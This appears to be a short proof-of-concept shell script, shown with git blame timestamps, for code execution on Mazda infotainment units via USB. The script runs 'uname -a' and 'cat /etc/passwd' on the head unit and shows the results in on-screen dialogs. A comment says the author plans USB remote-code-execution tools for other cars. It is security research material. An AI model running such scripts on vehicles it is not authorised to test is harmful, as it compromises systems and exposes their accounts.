2017-06-06 02:25:36 -05:00
|
|
|
#!/bin/sh
|
2017-06-06 16:56:01 -05:00
|
|
|
# by @shipcod3
|
2017-06-06 16:51:58 -05:00
|
|
|
# credits goes to http://mazdatweaks.com/ for the wonderful Mazda hacks since this is a known technique for CMU :)
|
2017-06-06 16:56:01 -05:00
|
|
|
# more info: http://mazda3revolution.com/forums/2014-2017-mazda-3-skyactiv-audio-electronics/57714-infotainment-project.html
|
|
|
|
|
# planning to compile some plug and play usb to RCE for other cars soon
|
2017-06-05 16:07:59 -05:00
|
|
|
|
2017-06-06 02:54:11 -05:00
|
|
|
/jci/tools/jci-dialog --title="PoC" --text="A PoC that the USB port is an attack surface" --ok-label='OK' --no-cancel
|
2017-06-06 02:53:31 -05:00
|
|
|
/jci/tools/jci-dialog --title="gr33tz" --text="To ROOTCON family" --ok-label='OK' --no-cancel
|
|
|
|
|
|
|
|
|
|
get_uname()
|
|
|
|
|
{
|
|
|
|
|
_uname=$(/bin/uname -a)
|
|
|
|
|
echo "${_uname}"
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
get_passwd()
|
|
|
|
|
{
|
|
|
|
|
_passwd=$(/bin/cat /etc/passwd)
|
|
|
|
|
echo "${_passwd}"
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
GET_UNAME=$(get_uname)
|
|
|
|
|
GET_PASSWD=$(get_passwd)
|
|
|
|
|
/jci/tools/jci-dialog --title="Executing uname -a" --text="${GET_UNAME}" --ok-label='OK' --no-cancel
|
|
|
|
|
/jci/tools/jci-dialog --title="Executing cat /etc/passwd" --text="${GET_PASSWD}" --ok-label='OK' --no-cancel
|
2017-06-05 16:07:59 -05:00
|
|
|
|
|
|
|
|
sleep 10
|
|
|
|
|
|
|
|
|
|
killall jci-dialog
|
